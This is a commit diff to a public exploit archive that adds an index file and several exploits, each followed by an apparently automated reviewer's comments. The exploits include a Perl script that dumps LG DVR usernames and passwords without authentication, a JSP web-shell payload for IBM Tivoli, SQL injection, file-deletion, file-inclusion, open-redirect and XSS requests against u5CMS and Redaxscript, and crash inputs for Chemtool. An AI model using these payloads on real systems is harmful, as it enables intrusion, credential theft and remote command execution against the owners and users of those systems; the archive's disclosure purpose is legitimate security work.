Update: 2015-02-10

11 new exploits
Offensive Security 2015-02-10 08:36:13 +00:00
parent 43f1ce78ff
commit de2152bda8
12 changed files with 830 additions and 0 deletions


@ -32444,6 +32444,7 @@ id,file,description,date,author,platform,type,port
35998,platforms/php/webapps/35998.txt,"CobraScripts Trading Marketplace Script 'cid' Parameter SQL Injection Vulnerability",2011-07-25,Ehsan_Hp200,php,webapps,0
36000,platforms/php/webapps/36000.txt,"HP Network Automation <= 9.10 SQL Injection Vulnerability",2011-07-28,anonymous,php,webapps,0
36001,platforms/asp/webapps/36001.txt,"Sitecore CMS <= 6.4.1 'url' Parameter URI Redirection Vulnerability",2011-07-28,"Tom Neaves",asp,webapps,0
36002,platforms/jsp/webapps/36002.txt,"IBM Tivoli Service Automation Manager 7.2.4 - Remote Code Execution",2014-12-12,"Jakub Palaczynski",jsp,webapps,0
36003,platforms/php/webapps/36003.txt,"Curverider Elgg <= 1.7.9 Multiple Cross Site Scripting Vulnerabilities",2011-08-01,"Aung Khant",php,webapps,0
36004,platforms/multiple/remote/36004.txt,"Skype <= 5.3 'Mobile Phone' Field HTML Injection Vulnerability",2011-08-01,noptrix,multiple,remote,0
36005,platforms/php/webapps/36005.txt,"MyBB MyTabs Plugin 'tab' Parameter SQL Injection Vulnerability",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0
@ -32455,9 +32456,19 @@ id,file,description,date,author,platform,type,port
36011,platforms/asp/webapps/36011.txt,"Ataccan E-ticaret Scripti 'id' Parameter SQL Injection Vulnerability",2011-08-03,Err0R,asp,webapps,0
36012,platforms/php/webapps/36012.txt,"Joomla! Slideshow Gallery Component 'id' Parameter SQL Injection Vulnerability",2011-08-03,"Ne0 H4ck3R",php,webapps,0
36013,platforms/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 'pysmb.py' Remote Arbitrary Shell Command Execution Vulnerability",2011-08-03,daveb,multiple,remote,0
36014,platforms/hardware/remote/36014.pl,"LG DVR LE6016D - Unauthenticated Remote Users/Passwords Disclosure exploit",2015-02-07,"Todor Donev",hardware,remote,0
36015,platforms/php/webapps/36015.txt,"Joomla! 'com_community' Component 'userid' Parameter SQL Injection Vulnerability",2011-08-03,"Ne0 H4ck3R",php,webapps,0
36016,platforms/multiple/remote/36016.txt,"Xpdf 3.02-13 'zxpdf' Security Bypass Vulnerability",2011-08-04,"Chung-chieh Shan",multiple,remote,0
36017,platforms/php/webapps/36017.txt,"HESK 2.2 Multiple Cross Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",php,webapps,0
36018,platforms/php/webapps/36018.txt,"WordPress WP e-Commerce Plug-in 3.8.6 'cart_messages[]' Parameter Cross Site Scripting Vulnerability",2011-08-04,"High-Tech Bridge SA",php,webapps,0
36019,platforms/asp/webapps/36019.txt,"Community Server 2007/2008 'TagSelector.aspx' Cross Site Scripting Vulnerability",2011-08-04,PontoSec,asp,webapps,0
36020,platforms/windows/remote/36020.txt,"Microsoft Visual Studio Report Viewer 2005 Control Multiple Cross Site Scripting Vulnerabilities",2011-08-09,"Adam Bixby",windows,remote,0
36022,platforms/windows/dos/36022.py,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow PoC",2015-02-09,"Samandeep Singh",windows,dos,0
36023,platforms/php/webapps/36023.txt,"Redaxscript CMS 2.2.0 - SQL Injection Vulnerability",2015-02-09,"ITAS Team",php,webapps,0
36024,platforms/linux/dos/36024.txt,"Chemtool 1.6.14 - Memory Corruption Vulnerability",2015-02-08,"Pablo González",linux,dos,0
36025,platforms/php/webapps/36025.txt,"u5CMS 3.9.3 - Multiple Open Redirect Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0
36026,platforms/php/webapps/36026.txt,"u5CMS 3.9.3 - (deletefile.php) Arbitrary File Deletion Vulnerability",2015-02-09,LiquidWorm,php,webapps,0
36027,platforms/php/webapps/36027.txt,"u5CMS 3.9.3 - Multiple SQL Injection Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0
36028,platforms/php/webapps/36028.txt,"u5CMS 3.9.3 - (thumb.php) Local File Inclusion Vulnerability",2015-02-09,LiquidWorm,php,webapps,0
36029,platforms/php/webapps/36029.txt,"u5CMS 3.9.3 - Multiple Stored And Reflected XSS Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0
36031,platforms/php/webapps/36031.txt,"StaMPi - Local File Inclusion",2015-02-09,"e . V . E . L",php,webapps,0
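Review bot: The last row (36031) records the date as 2015-02-09, but the file it indexes, platforms/php/webapps/36031.txt, carries `# Date: 16/2/15`, which is also later than this commit's own date; one of the two should be corrected so the index and the advisory agree. Row 36023 is indexed as "Redaxscript CMS 2.2.0" while that file's title line spells the product "Radexscript"; the index matches the vendor homepage given in the file, so the file is the one to fix. Row 36014 is the only new entry in this hunk dated 2015; the surrounding rows carry 2011 dates, which looks like a back-fill of older advisories and would be worth a word in the commit message.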



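--- a/platforms/hardware/remote/36014.pl
+++ b/platforms/hardware/remote/36014.pl
@@ -0,0 +1,90 @@
+#!/usr/bin/perl
+#
+# LG DVR LE6016D unauthenticated remote
+# users/passwords disclosure exploit
+#
+#
+# Copyright 2015 (c) Todor Donev
+# <todor.donev at gmail.com>
+# http://www.ethical-hacker.org/
+####
+#
+# Digital video recorder (DVR) surveillance is the use of cameras,
+# often hidden or concealed, that use DVR technology to record
+# video for playback or immediate viewing. As technological
+# innovations have made improvements in the security and
+# surveillance industry, DVR surveillance has become more
+# prominent and allows for easier and more versatile security
+# systems in homes and businesses. A DVR surveillance security
+# system can be designed for indoor use or outdoor use and can
+# often involve hidden security cameras, concealed “nanny cams”
+# for home security, and even personal recording devices hidden
+# on a person.
+#
+####
+#
+# Description:
+# No authentication (login) is required to exploit this vulnerability.
+# This program demonstrates how unpatched security bug would enable
+# hackers to gain control of a vulnerable device while sitting
+# behind their keyboard, potentially thousands of miles away.
+# An unauthenticated attacker that is connected to the DVR's may be
+# able to retrieve the device's administrator password allowing them
+# to directly access the device's configuration control panel.
+#
+####
+#
+# Disclaimer:
+# This or previous programs is for Educational purpose ONLY. Do not
+# use it without permission.The usual disclaimer applies, especially
+# the fact that Todor Donev is not liable for any damages caused by
+# direct or indirect use of the information or functionality provided
+# by these programs. The author or any Internet provider bears NO
+# responsibility for content or misuse of these programs or any
+# derivatives thereof. By using these programs you accept the fact
+# that any damage (dataloss, system crash, system compromise, etc.)
+# caused by the use of these programs is not Todor Donev's
+# responsibility.
+#
+####
+# Use them at your own risk!
+####
+#
+# $ perl lg.pl 133.7.133.7:80
+# LG DVR LE6016D unauthenticated remote
+# users/passwords disclosure exploit
+# u/p: admin/000000
+# u/p: user1/000000
+# u/p: user2/000000
+# u/p: user3/000000
+# u/p: LOGOUT/000000
+# Copyright 2015 (c) Todor Donev
+# <todor.donev at gmail.com>
+# http://www.ethical-hacker.org/
+#
+####
+use LWP::Simple;
+print " LG DVR LE6016D unauthenticated remote\n users/passwords disclosure exploit\n";
+if (@ARGV == 0) {&usg; &foot;}
+while (@ARGV > 0) {
+$t = shift(@ARGV);
+}
+my $r = get("http://$t/dvr/wwwroot/user.cgi") or die("Error $!");
+for (my $i=0; $i <= 4; $i++){
+if ($r =~ m/<name>(.*)<\/name>/g){
+print " u\/p: $1\/";
+}
+if ($r =~ m/<pw>(.*)<\/pw>/g){
+print "$1\n";
+}
+}
+&foot;
+sub usg(){
+print "\n Usage: perl $0 <target:port>\n Example: perl $0 133.7.133.7:80\n\n";
+}
+sub foot(){
+print " Copyright 2015 (c) Todor Donev\n <todor.donev at gmail.com>\n";
+print " http://www.ethical-hacker.org/\n";
+exit;
+}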
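Review bot: `get(...) or die("Error $!")` on the fetch line reports the wrong thing: LWP::Simple::get returns undef on any HTTP failure without setting `$!`, so the message is empty or stale; `die "Request to $t failed\n"` is at least honest, and a `LWP::UserAgent` call would expose `$res->status_line`. The script also lacks `use strict; use warnings;`, `$t` is a package global assigned from `@ARGV` with no check that it looks like `host:port`, and the `sub usg()` / `sub foot()` prototypes are a Perl anti-pattern when the subs are called with `&`. From the defender's side, the finding is an unauthenticated CGI that returns stored credentials, so the controls to confirm are keeping the DVR's web interface off untrusted networks and replacing the factory-default passwords the sample output shows.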

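--- a/platforms/jsp/webapps/36002.txt
+++ b/platforms/jsp/webapps/36002.txt
@@ -0,0 +1,69 @@
+# Exploit Title: IBM Tivoli Service Automation Manager Remote Code Execution
+# Date: 12\12\2014
+# Exploit Author: Jakub Palaczynski
+# Vendor Homepage: http://www.ibm.com/
+# Version: All versions of IBM Tivoli Service Automation Manager up to 7.2.4
+# VU/CVE: VU#782708, CVE-2015-0104
+1. Create report
+2. Browse to: https://site/maximo/report?__document=/system/path/web/root/shell.jsp&__report=<valid_report_name>&appname=<valid_appname>&__requestid=&reportNum=
+3. Catch SOAP request generated by submitting form from previous step and inject JSP payload. Sample SOAP request:
+POST /maximo/report?__document=/system/path/web/root/shell.jsp&__report=<valid_report_name>&appname=<valid_appname>&__requestid=&__sessionId=<valid_sessionid> HTTP/1.1
+Host: site
+Content-Length: xxx
+<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetUpdatedObjects xmlns="http://schemas.eclipse.org/birt"><Operation><Target><Id>Document</Id><Type>Document</Type></Target><Operator>GetPage</Operator><Oprand><Name>where</Name><Value>aaaaaaaaaaaaaaaaaaaaaa<![CDATA[<%@ page import="java.util.*,java.io.*"%>
+<%
+try {
+String cmd;
+String[] cmdarr;
+String OS = System.getProperty("os.name");
+if (request.getParameter("cmd") != null) {
+cmd = new String (request.getParameter("cmd"));
+if (OS.startsWith("Windows")) {
+cmdarr = new String [] {"cmd", "/C", cmd};
+}
+else {
+cmdarr = new String [] {"/bin/sh", "-c", cmd};
+}
+Process p = Runtime.getRuntime().exec(cmdarr);
+OutputStream os = p.getOutputStream();
+InputStream in = p.getInputStream();
+DataInputStream dis = new DataInputStream(in);
+String disr = dis.readLine();
+while ( disr != null ) {
+out.println(disr);
+disr = dis.readLine();
+}
+}
+} catch (Exception e) { e.printStackTrace();}
+%>]]>aaaaaaaaaaaaaaaaaaaaaa</Value></Oprand><Oprand><Name>__isdisplay__where</Name><Value></Value></Oprand><Oprand><Name>appname</Name><Value>APPNAME</Value></Oprand><Oprand><Name>__isdisplay__appname</Name><Value>APPNAME</Value></Oprand><Oprand><Name>usepagebreaks</Name><Value>true</Value></Oprand><Oprand><Name>__isdisplay__usepagebreaks</Name><Value>true</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__svg</Name><Value>true</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__taskid</Name><Value></Value></Oprand></Operation></GetUpdatedObjects></soap:Body></soap:Envelope>
+4. Web shell is now ready to use in path specified in __document parameter's value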
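Review bot: The header lists the affected versions and CVE-2015-0104 / VU#782708 but no vendor fix or bulletin, so a reader cannot tell which Tivoli Service Automation Manager level or interim fix closes this; add a line such as `# Vendor Fix: [IBM security bulletin URL]` beside the CVE line. `# Date: 12\12\2014` uses backslashes where every other file in this commit uses `/` or `-`; `12/12/2014` would also match the files.csv entry. Step 4 shows that the `__document` value is treated as a server-side write path, so the controls worth stating for defenders are restricting that parameter to report identifiers rather than filesystem paths and keeping the web root unwritable by the application account — hedged, since the server-side handling itself is not shown here.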

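--- a/platforms/linux/dos/36024.txt
+++ b/platforms/linux/dos/36024.txt
@@ -0,0 +1,104 @@
+Document Title:
+===============
+Chemtool 1.6.14 Memory Corruption Vulnerability
+Date:
+=============
+08/02/2015
+Vendor Homepage:
+================
+http://ruby.chemie.uni-freiburg.de/~martin/chemtool/
+Abstract Advisory Information:
+==============================
+Memory Corruption Vulnerability on Chemtool 1.6.14.
+Affected Product(s):
+====================
+Chemtool 1.6.14 or older
+Exploitation Technique:
+=======================
+Local
+Severity Level:
+===============
+Medium
+Technical Details & Description:
+================================
+A Memory Corruption Vulnerability is detected on Chemtool 1.6.14. An
+attacker can crash the software by using an input file.
+Also, an attacker can crash the software by entering a filename too long.
+b77a8000-b77a9000 r--s 00000000 08:01 152558
+/var/cache/fontconfig/3fe29f0c9fa221c8ee16555d4835b3ab-le32d4.cache-4
+b77a9000-b77aa000 r--s 00000000 00:15 209651 /run/user/1000/dconf/user
+b77aa000-b77bb000 r-xp 00000000 08:01 393480
+/usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
+b77bb000-b77bc000 r--p 00010000 08:01 393480
+/usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
+b77bc000-b77bd000 rw-p 00011000 08:01 393480
+/usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
+b77bd000-b77be000 rwxp 00000000 00:00 0
+b77be000-b77bf000 r--p 00855000 08:01 274691
+/usr/lib/locale/locale-archive
+b77bf000-b77c0000 r--p 00596000 08:01 274691
+/usr/lib/locale/locale-archive
+b77c0000-b77c2000 rw-p 00000000 00:00 0
+b77c2000-b77c3000 r-xp 00000000 00:00 0 [vdso]
+b77c3000-b77e3000 r-xp 00000000 08:01 132074 /lib/i386-linux-gnu/
+ld-2.19.so
+b77e3000-b77e4000 r--p 0001f000 08:01 132074 /lib/i386-linux-gnu/
+ld-2.19.so
+b77e4000-b77e5000 rw-p 00020000 08:01 132074 /lib/i386-linux-gnu/
+ld-2.19.so
+bfeff000-bff21000 rw-p 00000000 00:00 0 [stack]
+Aborted (core dumped)
+Proof of Concept (PoC):
+=======================
+This vulnerabilities can be exploited by local attackers with
+userinteraction.
+First test. Attacker can generate a malicious file (format .png).This file
+can produced a Stack Smashing.
+#/usr/bin/ruby
+buf = "a"*3000
+filename = "crash.png"
+file = open(filename,'w')
+file.write(buf)
+file.close
+puts "file created!"
+Second test. Attacker can enter a filename too long. For example, this
+program needs recieve a parameter. If this parameter is too long, It will
+crash.
+$chemtool $(perl -e 'print "A"x900')
+How to perform:
+=======================
+1) You can test it with gdb. You attach this application.
+2) Run it, now, you can move "crash.png" file that we generated by our ruby
+script to the application. Also, you can run argv[1] with a long value.
+When you perform above steps so application will crash. Analyze it on gdb.
+Solution - Fix & Patch:
+=======================
+Restrict working maximum size. I believe that this bug doesn't have
+solution.
+Security Risk:
+==============
+The security risk of the vulnerability is estimated as medium because of
+the local crash method.
+Authors:
+==================
+Pablo González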
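Review bot: The Ruby generator's first line is `#/usr/bin/ruby`, which is a plain comment rather than a shebang; it needs `#!/usr/bin/ruby` (or `#!/usr/bin/env ruby`) to be run the way the text describes. The "Solution - Fix & Patch" section contradicts itself: it recommends restricting the maximum size and then says the bug has no solution; if the crash is the unbounded copy of a filename/argument that the text implies, a length check is the fix and the second sentence should go. The dump between the description and the PoC is only the tail of the process memory map ending in `Aborted (core dumped)`; the line naming the failing check (presumably glibc's stack-smashing detector, given the "Stack Smashing" wording) and a backtrace would tell a maintainer far more than the map does.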

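--- a/platforms/php/webapps/36023.txt
+++ b/platforms/php/webapps/36023.txt
@@ -0,0 +1,175 @@
+# Exploit Title: Radexscript CMS 2.2.0 - SQL Injection vulnerability
+# Google Dork: N/A
+# Date: 02/09/2015
+# Exploit Author: Pham Kien Cuong (cuong.k.pham@itas.vn) & ITAS Team (www.itas.vn)
+# Vendor Homepage: http://redaxscript.com/
+# Software Link: http://redaxscript.com/download/releases
+# Version: Redaxscript 2.2.0
+# Tested on: Linux
+# CVE : CVE-2015-1518
+:: PROOF OF CONCEPT ::
+POST /redaxscript/ HTTP/1.1
+Host: target.local
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=khtnnm1tvvk3s12if0no367872; GEAR=local-5422433b500446ead50002d4
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 96
+search_terms=[SQL INJECTION HERE]&search_post=&token=24bcb285bc6f5c93203e4f95d9f2008331faf294&search_post=Search
+- Vulnerable parameter: $search_terms
+- Vulnerable file: redaxscript/includes/search.php
+- Vulnerable function: search_post()
+- Vulnerable code:
+function search_post()
+{
+/* clean post */
+if (ATTACK_BLOCKED < 10)
+{
+$search_terms = clean($_POST['search_terms'], 5);
+}
+/* validate post */
+if (strlen($search_terms) < 3 || $search_terms == l('search_terms'))
+{
+$error = l('input_incorrect');
+}
+/* query results */
+else
+{
+$search = array_filter(explode(' ', $search_terms));
+$search_keys = array_keys($search);
+$last = end($search_keys);
+/* query search */
+$query = 'SELECT id, title, alias, description, date, category, access FROM ' . PREFIX . 'articles WHERE (language = \'' . Redaxscript\Registry::get('language') . '\' || language = \'\') && status = 1';
+if ($search)
+{
+$query .= ' && (';
+foreach ($search as $key => $value)
+{
+$query .= 'title LIKE \'%' . $value . '%\' || description LIKE \'%' . $value . '%\' || keywords LIKE \'%' . $value . '%\' || text LIKE \'%' . $value . '%\'';
+if ($last != $key)
+{
+$query .= ' || ';
+}
+}
+$query .= ')';
+}
+$query .= ' ORDER BY date DESC LIMIT 50';
+$result = Redaxscript\Db::forTablePrefix('articles')->rawQuery($query)->findArray();
+$num_rows = count($result);
+if ($result == '' || $num_rows == '')
+{
+$error = l('search_no');
+}
+/* collect output */
+else if ($result)
+{
+$accessValidator = new Redaxscript\Validator\Access();
+$output = '<h2 class="title_content title_search_result">' . l('search') . '</h2>';
+$output .= form_element('fieldset', '', 'set_search_result', '', '', '<span class="title_content_sub title_search_result_sub">' . l('articles') . '</span>') . '<ol class="list_search_result">';
+foreach ($result as $r)
+{
+$access = $r['access'];
+/* if access granted */
+if ($accessValidator->validate($access, MY_GROUPS) === Redaxscript\Validator\Validator::PASSED)
+{
+if ($r)
+{
+foreach ($r as $key => $value)
+{
+$$key = stripslashes($value);
+}
+}
+/* prepare metadata */
+if ($description == '')
+{
+$description = $title;
+}
+$date = date(s('date'), strtotime($date));
+/* build route */
+if ($category == 0)
+{
+$route = $alias;
+}
+else
+{
+$route = build_route('articles', $id);
+}
+/* collect item output */
+$output .= '<li class="item_search_result">' . anchor_element('internal', '', 'link_search_result', $title, $route, $description) . '<span class="date_search_result">' . $date . '</span></li>';
+}
+else
+{
+$counter++;
+}
+}
+$output .= '</ol></fieldset>';
+/* handle access */
+if ($num_rows == $counter)
+{
+$error = l('access_no');
+}
+}
+}
+/* handle error */
+if ($error)
+{
+notification(l('something_wrong'), $error);
+}
+else
+{
+echo $output;
+}
+}
+:: SOLUTION ::
+Update to Redaxscript 2.3.0
+::INFORMATION DISCLOSURE::
+- 11/27/2014: Inform the vendor
+- 11/28/2014: Vendor confirmed
+- 01/29/2015: Vendor releases patch
+- 01/05/2015: ITAS Team publishes information
+:: REFERENCE ::
+- http://www.itas.vn/news/itas-team-found-out-a-sql-injection-vulnerability-in-redaxscript-2-2-0-cms-75.html
+::COPYRIGHT::
+Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP (www.itas.vn).
+:: DISCLAIMER ::
+THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.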
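Review bot: The title line spells the product "Radexscript" while the vendor homepage, the `# Version:` line and the files.csv entry all say "Redaxscript"; the title should read `# Exploit Title: Redaxscript CMS 2.2.0 - SQL Injection vulnerability`. The disclosure timeline is out of order — `01/29/2015: Vendor releases patch` is followed by `01/05/2015: ITAS Team publishes information` — and with the header dated 02/09/2015 the last entry is presumably `02/05/2015`; confirm against the referenced ITAS post. In the quoted `search_post()`, each whitespace-separated term is concatenated into the `LIKE '%...%'` clauses after `clean($_POST['search_terms'], 5)`, and what that cleaning level strips is not shown, so for defenders the useful check is that the 2.3.0 fix binds or escapes the terms at the database layer rather than relying on `clean()`.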

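--- a/platforms/php/webapps/36025.txt
+++ b/platforms/php/webapps/36025.txt
@@ -0,0 +1,66 @@
+?
+u5CMS 3.9.3 Multiple Open Redirect Vulnerabilities
+Vendor: Stefan P. Minder
+Product web page: http://www.yuba.ch
+Affected version: 3.9.3 and 3.9.2
+Summary: u5CMS is a little, handy Content Management System for medium-sized
+websites, conference / congress / submission administration, review processes,
+personalized serial mails, PayPal payments and online surveys based on PHP and
+MySQL and Apache.
+Desc: Input passed via the 'uri' GET parameter in 'meta2.php' script and using
+Cookie 'pidvesa' is not properly verified before being used to redirect users.
+This can be exploited to redirect a user to an arbitrary website e.g. when a
+user clicks a specially crafted link to the affected script hosted on a trusted
+domain.
+==============================================================================
+\u5admin\pidvesa.php:
+---------------------
+Line 5: if ('<?php echo $_COOKIE['pidvesa']?>'!='') location.href='<?php echo $_COOKIE['pidvesa']?>'+'.php';
+==============================================================================
+Tested on: Apache 2.4.10 (Win32)
+PHP 5.6.3
+MySQL 5.6.21
+Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+Advisory ID: ZSL-2015-5227
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5227.php
+29.12.2014
+---
+#1
+This request example adds '.php' at the end to the pidvesa cookie value:
+GET /u5cms/u5admin/pidvesa.php HTTP/1.1
+Host: 10.0.50.3
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=mkmhuo3gquomkki4lurhap45o3; aclan=de; pidvesa=http://zeroscience.mk/evil/script;
+Connection: keep-alive
+- To redirect to: http://zeroscience.mk/evil/script.php
+--
+#2
+GET /u5cms/u5admin/meta2.php?uri=http://zeroscience.mk HTTP/1.1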
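Review bot: The code excerpt under `\u5admin\pidvesa.php:` shows the `pidvesa` cookie value echoed straight into a JavaScript string and then into `location.href`, but the description also names the `uri` parameter of `meta2.php` and that second sink is never shown; adding the corresponding line from meta2.php would make both findings traceable. This section ends after the second request (`#2 GET ... meta2.php?uri=...`) although the hunk header claims 66 added lines, so the rendering appears to have dropped the remainder — worth checking the file on disk. None of the five u5CMS advisories in this commit (36025 through 36029) carries a fixed-version or vendor-response line after `Affected version: 3.9.3 and 3.9.2`, which leaves defenders with no upgrade target; for this one the mitigation is to allow-list the cookie and `uri` values against local script names before redirecting and to escape them on output.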

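--- a/platforms/php/webapps/36026.txt
+++ b/platforms/php/webapps/36026.txt
@@ -0,0 +1,41 @@
+?
+u5CMS 3.9.3 (deletefile.php) Arbitrary File Deletion Vulnerability
+Vendor: Stefan P. Minder
+Product web page: http://www.yuba.ch
+Affected version: 3.9.3 and 3.9.2
+Summary: u5CMS is a little, handy Content Management System for medium-sized
+websites, conference / congress / submission administration, review processes,
+personalized serial mails, PayPal payments and online surveys based on PHP and
+MySQL and Apache.
+Desc: Input passed to the 'f' parameter in 'deletefile.php' is not properly
+sanitised before being used to delete files. This can be exploited to delete
+files with the permissions of the web server using their absolute path or via
+directory traversal sequences passed within the affected GET parameter.
+Tested on: Apache 2.4.10 (Win32)
+PHP 5.6.3
+MySQL 5.6.21
+Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+Advisory ID: ZSL-2015-5226
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5226.php
+29.12.2014
+---
+Target: C:\deleteme.txt
+-----------------------
+GET /u5cms/u5admin/deletefile.php?typ=d&name=shortreference&f=/deleteme.txt HTTP/1.1
+GET /u5cms/u5admin/deletefile.php?typ=d&name=shortreference&f=../../../../../../deleteme.txt HTTP/1.1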
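Review bot: The two requests show `f` being honoured both as an absolute path and with `../` sequences, but the advisory never says whether the `u5admin/` endpoint requires an authenticated session, which changes the severity considerably; the thumb.php advisory in this same commit does state "authenticated", and this one should be equally explicit. The mitigation worth spelling out is to resolve `f` with `realpath()` and reject any result outside the intended files directory, rather than stripping traversal sequences, since the absolute-path request bypasses stripping entirely.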

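--- a/platforms/php/webapps/36027.txt
+++ b/platforms/php/webapps/36027.txt
@@ -0,0 +1,66 @@
+?
+u5CMS 3.9.3 Multiple SQL Injection Vulnerabilities
+Vendor: Stefan P. Minder
+Product web page: http://www.yuba.ch
+Affected version: 3.9.3 and 3.9.2
+Summary: u5CMS is a little, handy Content Management System for medium-sized
+websites, conference / congress / submission administration, review processes,
+personalized serial mails, PayPal payments and online surveys based on PHP and
+MySQL and Apache.
+Desc: Input passed via multiple parameters in multiple scripts is not properly
+sanitised before being used in SQL queries. This can be exploited to manipulate
+SQL queries by injecting arbitrary SQL code.
+Tested on: Apache 2.4.10 (Win32)
+PHP 5.6.3
+MySQL 5.6.21
+Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+Advisory ID: ZSL-2015-5225
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5225.php
+29.12.2014
+---
+1. POST /u5cms/u5admin/copy2.php?name=album HTTP/1.1
+name=album[INJECT]
+2. GET /u5cms/u5admin/editor.php?c=start[INJECT] HTTP/1.1
+3. GET /u5cms/u5admin/localize.php?name=album[INJECT] HTTP/1.1
+4. POST /u5cms/u5admin/meta2.php?typ=a[INJECT]&uri=metai.php HTTP/1.1
+5. GET /u5cms/u5admin/metai.php?typ=a&name=album[INJECT] HTTP/1.1
+6. GET /u5cms/u5admin/nc.php?name=o[INJECT] HTTP/1.1
+7. POST /u5cms/u5admin/new2.php?typ=e HTTP/1.1
+name=test[INJECT]&typ=e
+8. POST /u5cms/u5admin/rename2.php?name=album HTTP/1.1
+name=album2[INJECT]&ulinks=yes
+9. GET /u5cms/u5admin/rename2.php?name=valbum&newname=valbum2[INJECT]&typ=a HTTP/1.1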
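Review bot: The nine injection points are listed as bare requests with `[INJECT]` markers, but neither the affected SQL statement nor the authentication context of the `u5admin/` scripts is given, so a reader cannot tell which are reachable before login or what each query does; a one-line note per entry (script, query purpose, login required) would make the list actionable for a defender. Entries 8 and 9 hit the same `rename2.php` via POST and GET with different parameters (`name` vs `newname`), which suggests two code paths rather than one, and the advisory should say so. The remedy to recommend is parameterised queries for the `name`, `c`, `typ` and `newname` values rather than per-script escaping.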

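--- a/platforms/php/webapps/36028.txt
+++ b/platforms/php/webapps/36028.txt
@@ -0,0 +1,38 @@
+?
+u5CMS 3.9.3 (thumb.php) Local File Inclusion Vulnerability
+Vendor: Stefan P. Minder
+Product web page: http://www.yuba.ch
+Affected version: 3.9.3 and 3.9.2
+Summary: u5CMS is a little, handy Content Management System for medium-sized
+websites, conference / congress / submission administration, review processes,
+personalized serial mails, PayPal payments and online surveys based on PHP and
+MySQL and Apache.
+Desc: u5CMS suffers from an authenticated file inclusion vulnerability (LFI) when
+input passed thru the 'f' parameter to thumb.php script is not properly verified
+before being used to include files. This can be exploited to include files from
+local resources with their absolute path and with directory traversal attacks.
+Tested on: Apache 2.4.10 (Win32)
+PHP 5.6.3
+MySQL 5.6.21
+Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+Advisory ID: ZSL-2015-5224
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5224.php
+29.12.2014
+---
+GET /u5cms/thumb.php?w=100&f=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
+GET /u5cms/thumb.php?w=100&f=/windows/win.ini HTTP/1.1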
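Review bot: The title and description call this a file inclusion, but the two requests only demonstrate that `thumb.php` returns the contents of `win.ini`, and the `w=100` parameter suggests an image-resizing script; whether `f` is passed to `include()` or merely read and served (a traversal/disclosure rather than an inclusion) is not shown, and that distinction drives the severity a defender assigns. Quoting the line of thumb.php that consumes `f` would settle it. Either way the fix to recommend is resolving the path and requiring it to sit under the images directory before opening it.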

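--- a/platforms/php/webapps/36029.txt
+++ b/platforms/php/webapps/36029.txt
@@ -0,0 +1,101 @@
+?
+u5CMS 3.9.3 Multiple Stored And Reflected XSS Vulnerabilities
+Vendor: Stefan P. Minder
+Product web page: http://www.yuba.ch
+Affected version: 3.9.3 and 3.9.2
+Summary: u5CMS is a little, handy Content Management System for medium-sized
+websites, conference / congress / submission administration, review processes,
+personalized serial mails, PayPal payments and online surveys based on PHP and
+MySQL and Apache.
+Desc: u5CMS suffers from multiple stored and reflected cross-site scripting
+vulnerabilities. Input passed to several POST and GET parameters is not properly
+sanitised before being returned to the user. This can be exploited to execute
+arbitrary HTML and script code in a user's browser session in context of an
+affected site.
+Tested on: Apache 2.4.10 (Win32)
+PHP 5.6.3
+MySQL 5.6.21
+Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+Advisory ID: ZSL-2015-5223
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5223.php
+29.12.2014
+---
+Reflected XSS:
+==============
+GET /u5cms/index.php?c=start"><script>alert(1)</script>&l=e&p=1&r= HTTP/1.1
+GET /u5cms/index.php?i=1"><script>alert(2)</script>&p=1&c=start&l=d HTTP/1.1
+GET /u5cms/index.php?c=start&l=e"><script>alert(3)</script>&p=1&r= HTTP/1.1
+GET /u5cms/index.php?c=start&l=e&p=1"><script>alert(4)</script>&r= HTTP/1.1
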